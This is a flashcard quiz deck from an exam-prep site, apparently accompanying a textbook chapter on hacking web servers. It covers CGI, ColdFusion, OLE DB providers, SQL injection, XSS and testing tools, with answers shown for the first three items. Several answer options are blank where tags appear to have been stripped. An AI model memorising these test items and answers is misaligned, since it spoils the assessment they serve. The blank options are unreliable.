Explore all topics
Start Free Trial
Need Help? Contact us
back arrowfull exam logo
search
ai logoChat with AI
Servicesarrow
Discoverarrow

Topics

Explore all topics
Discover more topics

Deck 10: Hacking Web Servers

Full screen (f)
exit full mode
Question
CGI programs can be written in many different programming and scripting languages, such as C/C++, Perl, UNIX shells, Visual Basic, and FORTRAN.
Use Space or
up arrow
down arrow
to flip the card.
Question
All CFML tags begin with "____".

A)?
B)CF
C)CFML
D)%
Question
Connecting to a Microsoft Active Directory Service database with OLE DB requires using ____ as the provider.

A)ADSDSOOBJECT
B)MySQLProv
C)SQLOLEDB
D)SNAOLEDB
Question
____ is the interface that describes how a Web server passes data to a Web browser.

A)Perl
B)ASP
C)CGI
D)PHP
Question
____ is a standard database access method developed by the SQLAccess Group.

A)OLE DB
B)ODBC
C)ADO
D)JDBC
Question
____ was originally used primarily on UNIX systems, but is used more widely now on many platforms, such as Macintosh and Windows.

A)HTML
B)JScript
C)VBScript
D)PHP
Question
Web applications written in CFML can also contain other client-side technologies, such as HTML and JavaScript.
Question
ColdFusion uses its own proprietary tags written in ____.

A)XML
B)DHTML
C)PHP
D)CFML
Question
The column tag in CFML is ____.

A)
B)
C)<%COL>
D)
Question
The ____ Search page is an excellent starting point when investigating VBScript vulnerabilities.

A)CVE Web site
B)CERT
C)Microsoft Security Bulletin
D)Macromedia security
Question
A user can view the source code of a PHP file by using the browser's "View Source" option.
Question
____, developed by Microsoft, is a set of interfaces that enable applications to access data stored in a database management system.

A)OLE DB
B)ODBC
C)ADO
D)JDBC
Question
Visual Basic Script (VBScript) is a scripting language developed by ____.

A)Sun Microsystems
B)Symantec
C)Macromedia
D)Microsoft
Question
OLE DB relies on connection strings that enable the application to access the data stored on an external device.
Question
Web servers use the ____ element in an HTML document to allow customers to submit information to the Web server.

A)
B)
C)
D)
Question
The JavaScript getElementByld() function is a method defined by the ____ Document Object Model (DOM).

A)W3C
B)IETF
C)Internet Society
D)IEEE
Question
To check whether a CGI program works, you should save the program to the ____ directory of your Web server, and then enter the URL in your Web browser.

A)bin
B)cgi-bin
C)cgi
D)scripts
Question
Connecting to an MS SQL Server database with OLE DB requires using ____ as the provider.

A)ADSDSOOBJECT
B)MySQLProv
C)SQLOLEDB
D)SNAOLEDB
Question
JavaScript is a server-side scripting language that is embedded in an HTML Web page.
Question
Connecting to a MySQL database with OLE DB requires using ____ as the provider.

A)ADSDSOOBJECT
B)MySQLProv
C)SQLOLEDB
D)SNAOLEDB
Question
In Windows, IIS stands for ______________________________.
Question
MATCHING
Match each term with the correct statement below.
a.WebGoat
f.Wfetch
b.HTML
g.JScript
c.CGI
h.virtual directory
d.Cgi Scanner v1.4
i.XSS
e.Apache
helps beginning Web application security testers gain a better understanding of the areas covered in the OWASP top ten Web applications vulnerability list
Question
SQL ____ involves the attacker supplying SQL commands when prompted to fill in a Web application field.

A)redirection
B)spoofing
C)injection
D)insertion
Question
MATCHING
Match each term with the correct statement below.
a.WebGoat
f.Wfetch
b.HTML
g.JScript
c.CGI
h.virtual directory
d.Cgi Scanner v1.4
i.XSS
e.Apache
language developed by Microsoft
Question
In a(n) ____ flaw, a Web browser might carry out code sent from a Web site.

A)broken access control
B)command injection
C)cross-site scripting
D)unvalidated parameters
Question
Connecting to a VSAM database with OLE DB requires using ____ as the provider.

A)ADSDSOOBJECT
B)MySQLProv
C)SQLOLEDB
D)SNAOLEDB
Question
CFML stands for ______________________________.
Question
____ represent(s) a comment in SQL.

A)Double slashes (//)
B)An exclamation point (!)
C)An asterisk (*)
D)Double hyphens (--)
Question
MATCHING
Match each term with the correct statement below.
a.WebGoat
f.Wfetch
b.HTML
g.JScript
c.CGI
h.virtual directory
d.Cgi Scanner v1.4
i.XSS
e.Apache
a Web server
Question
____ is one of the best tools for scanning the Web for systems with CGI vulnerabilities.

A)Cgiscan.c
B)WebGoat
C)Wfetch
D)Phfscan.c
Question
MATCHING
Match each term with the correct statement below.
a.WebGoat
f.Wfetch
b.HTML
g.JScript
c.CGI
h.virtual directory
d.Cgi Scanner v1.4
i.XSS
e.Apache
tool for searching Web sites for CGI scripts that can be exploited
Question
One of the best Web sites to find tools for hacking Web applications is ____.

A)http://www.cert.org
B)http://www.owasp.org
C)http://www.cve.mitre.org
D)http://packetstormsecurity.org
Question
MATCHING
Match each term with the correct statement below.
a.WebGoat
f.Wfetch
b.HTML
g.JScript
c.CGI
h.virtual directory
d.Cgi Scanner v1.4
i.XSS
e.Apache
GUI tool that can be downloaded free from Microsoft and is included in the IIS Resource Kit
Question
MATCHING
Match each term with the correct statement below.
a.WebGoat
f.Wfetch
b.HTML
g.JScript
c.CGI
h.virtual directory
d.Cgi Scanner v1.4
i.XSS
e.Apache
foundation of most Web applications
Question
____________________ Web pages display the same information regardless of the time of day or the user who activates the page.
Question
MATCHING
Match each term with the correct statement below.
a.WebGoat
f.Wfetch
b.HTML
g.JScript
c.CGI
h.virtual directory
d.Cgi Scanner v1.4
i.XSS
e.Apache
main role is passing data between a Web server and Web browser
Question
MATCHING
Match each term with the correct statement below.
a.WebGoat
f.Wfetch
b.HTML
g.JScript
c.CGI
h.virtual directory
d.Cgi Scanner v1.4
i.XSS
e.Apache
stands for cross-site scripting flaw
Question
____________________ Web pages can vary the information that's displayed depending on variables such as the current time and date, user name, and purchasing history (information collected via cookies or Web bugs).
Question
MATCHING
Match each term with the correct statement below.
a.WebGoat
f.Wfetch
b.HTML
g.JScript
c.CGI
h.virtual directory
d.Cgi Scanner v1.4
i.XSS
e.Apache
keeps attackers from knowing the directory structure on an IIS Web server
Question
To keep attackers from knowing the directory structure you create on an IIS Web server, creating a(n) ____________________ is recommended so that the path a user sees on the Web browser is not the actual path on the Web server.
Question
What is JavaScript?
Question
What is OWASP?
Question
What is ODBC used for?
Question
What is ActiveX Data Objects (ADO)?
Question
As a security professional, what should you do after identifying that a Web server you are testing is using PHP?
Question
What is ColdFusion?
Question
Why should security professionals have at least a little knowledge about the Apache Web Server?
Question
Dynamic Web pages need special components for displaying information that changes depending on user input or information obtained from a back-end server. What kind of components can Web pages use to achieve this?
Question
What is VBScript?
Question
What features does the current version of Wfetch offer?
Question
What can an attacker do after gaining control of a Web server?
Question
What is the main difference between HTML pages and Active Server Pages (ASP)?
Unlock Deck
Sign up to unlock the cards in this deck!
Unlock Deck
Unlock Deck
1/52
auto play flashcards
Play
simple tutorial
Full screen (f)
exit full mode
Deck 10: Hacking Web Servers
1
CGI programs can be written in many different programming and scripting languages, such as C/C++, Perl, UNIX shells, Visual Basic, and FORTRAN.
True
2
All CFML tags begin with "____".

A)?
B)CF
C)CFML
D)%
B
3
Connecting to a Microsoft Active Directory Service database with OLE DB requires using ____ as the provider.

A)ADSDSOOBJECT
B)MySQLProv
C)SQLOLEDB
D)SNAOLEDB
A
4
____ is the interface that describes how a Web server passes data to a Web browser.

A)Perl
B)ASP
C)CGI
D)PHP
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
5
____ is a standard database access method developed by the SQLAccess Group.

A)OLE DB
B)ODBC
C)ADO
D)JDBC
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
6
____ was originally used primarily on UNIX systems, but is used more widely now on many platforms, such as Macintosh and Windows.

A)HTML
B)JScript
C)VBScript
D)PHP
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
7
Web applications written in CFML can also contain other client-side technologies, such as HTML and JavaScript.
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
8
ColdFusion uses its own proprietary tags written in ____.

A)XML
B)DHTML
C)PHP
D)CFML
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
9
The column tag in CFML is ____.

A)
B)
C)<%COL>
D)
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
10
The ____ Search page is an excellent starting point when investigating VBScript vulnerabilities.

A)CVE Web site
B)CERT
C)Microsoft Security Bulletin
D)Macromedia security
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
11
A user can view the source code of a PHP file by using the browser's "View Source" option.
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
12
____, developed by Microsoft, is a set of interfaces that enable applications to access data stored in a database management system.

A)OLE DB
B)ODBC
C)ADO
D)JDBC
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
13
Visual Basic Script (VBScript) is a scripting language developed by ____.

A)Sun Microsystems
B)Symantec
C)Macromedia
D)Microsoft
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
14
OLE DB relies on connection strings that enable the application to access the data stored on an external device.
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
15
Web servers use the ____ element in an HTML document to allow customers to submit information to the Web server.

A)
B)
C)
D)
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
16
The JavaScript getElementByld() function is a method defined by the ____ Document Object Model (DOM).

A)W3C
B)IETF
C)Internet Society
D)IEEE
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
17
To check whether a CGI program works, you should save the program to the ____ directory of your Web server, and then enter the URL in your Web browser.

A)bin
B)cgi-bin
C)cgi
D)scripts
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
18
Connecting to an MS SQL Server database with OLE DB requires using ____ as the provider.

A)ADSDSOOBJECT
B)MySQLProv
C)SQLOLEDB
D)SNAOLEDB
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
19
JavaScript is a server-side scripting language that is embedded in an HTML Web page.
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
20
Connecting to a MySQL database with OLE DB requires using ____ as the provider.

A)ADSDSOOBJECT
B)MySQLProv
C)SQLOLEDB
D)SNAOLEDB
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
21
In Windows, IIS stands for ______________________________.
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
22
MATCHING
Match each term with the correct statement below.
a.WebGoat
f.Wfetch
b.HTML
g.JScript
c.CGI
h.virtual directory
d.Cgi Scanner v1.4
i.XSS
e.Apache
helps beginning Web application security testers gain a better understanding of the areas covered in the OWASP top ten Web applications vulnerability list
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
23
SQL ____ involves the attacker supplying SQL commands when prompted to fill in a Web application field.

A)redirection
B)spoofing
C)injection
D)insertion
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
24
MATCHING
Match each term with the correct statement below.
a.WebGoat
f.Wfetch
b.HTML
g.JScript
c.CGI
h.virtual directory
d.Cgi Scanner v1.4
i.XSS
e.Apache
language developed by Microsoft
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
25
In a(n) ____ flaw, a Web browser might carry out code sent from a Web site.

A)broken access control
B)command injection
C)cross-site scripting
D)unvalidated parameters
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
26
Connecting to a VSAM database with OLE DB requires using ____ as the provider.

A)ADSDSOOBJECT
B)MySQLProv
C)SQLOLEDB
D)SNAOLEDB
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
27
CFML stands for ______________________________.
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
28
____ represent(s) a comment in SQL.

A)Double slashes (//)
B)An exclamation point (!)
C)An asterisk (*)
D)Double hyphens (--)
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
29
MATCHING
Match each term with the correct statement below.
a.WebGoat
f.Wfetch
b.HTML
g.JScript
c.CGI
h.virtual directory
d.Cgi Scanner v1.4
i.XSS
e.Apache
a Web server
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
30
____ is one of the best tools for scanning the Web for systems with CGI vulnerabilities.

A)Cgiscan.c
B)WebGoat
C)Wfetch
D)Phfscan.c
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
31
MATCHING
Match each term with the correct statement below.
a.WebGoat
f.Wfetch
b.HTML
g.JScript
c.CGI
h.virtual directory
d.Cgi Scanner v1.4
i.XSS
e.Apache
tool for searching Web sites for CGI scripts that can be exploited
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
32
One of the best Web sites to find tools for hacking Web applications is ____.

A)http://www.cert.org
B)http://www.owasp.org
C)http://www.cve.mitre.org
D)http://packetstormsecurity.org
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
33
MATCHING
Match each term with the correct statement below.
a.WebGoat
f.Wfetch
b.HTML
g.JScript
c.CGI
h.virtual directory
d.Cgi Scanner v1.4
i.XSS
e.Apache
GUI tool that can be downloaded free from Microsoft and is included in the IIS Resource Kit
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
34
MATCHING
Match each term with the correct statement below.
a.WebGoat
f.Wfetch
b.HTML
g.JScript
c.CGI
h.virtual directory
d.Cgi Scanner v1.4
i.XSS
e.Apache
foundation of most Web applications
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
35
____________________ Web pages display the same information regardless of the time of day or the user who activates the page.
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
36
MATCHING
Match each term with the correct statement below.
a.WebGoat
f.Wfetch
b.HTML
g.JScript
c.CGI
h.virtual directory
d.Cgi Scanner v1.4
i.XSS
e.Apache
main role is passing data between a Web server and Web browser
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
37
MATCHING
Match each term with the correct statement below.
a.WebGoat
f.Wfetch
b.HTML
g.JScript
c.CGI
h.virtual directory
d.Cgi Scanner v1.4
i.XSS
e.Apache
stands for cross-site scripting flaw
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
38
____________________ Web pages can vary the information that's displayed depending on variables such as the current time and date, user name, and purchasing history (information collected via cookies or Web bugs).
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
39
MATCHING
Match each term with the correct statement below.
a.WebGoat
f.Wfetch
b.HTML
g.JScript
c.CGI
h.virtual directory
d.Cgi Scanner v1.4
i.XSS
e.Apache
keeps attackers from knowing the directory structure on an IIS Web server
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
40
To keep attackers from knowing the directory structure you create on an IIS Web server, creating a(n) ____________________ is recommended so that the path a user sees on the Web browser is not the actual path on the Web server.
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
41
What is JavaScript?
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
42
What is OWASP?
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
43
What is ODBC used for?
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
44
What is ActiveX Data Objects (ADO)?
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
45
As a security professional, what should you do after identifying that a Web server you are testing is using PHP?
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
46
What is ColdFusion?
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
47
Why should security professionals have at least a little knowledge about the Apache Web Server?
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
48
Dynamic Web pages need special components for displaying information that changes depending on user input or information obtained from a back-end server. What kind of components can Web pages use to achieve this?
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
49
What is VBScript?
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
50
What features does the current version of Wfetch offer?
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
51
What can an attacker do after gaining control of a Web server?
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
52
What is the main difference between HTML pages and Active Server Pages (ASP)?
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Unlock Deck
k this deck
locked card icon
Unlock Deck
Unlock for access to all 52 flashcards in this deck.
Examlex
Examlex
Work With Us
Policies
Download the App
Scan to downloadDownload the App
qr-code
Links
Links
Work With Us
Download the App

Scan to downloadDownload the App
qr-code

Copyright © 2025 Examlex LLC.
  • facebook-footer
  • instagram-footer
  • x-footer
  • tiktok
  • Linktree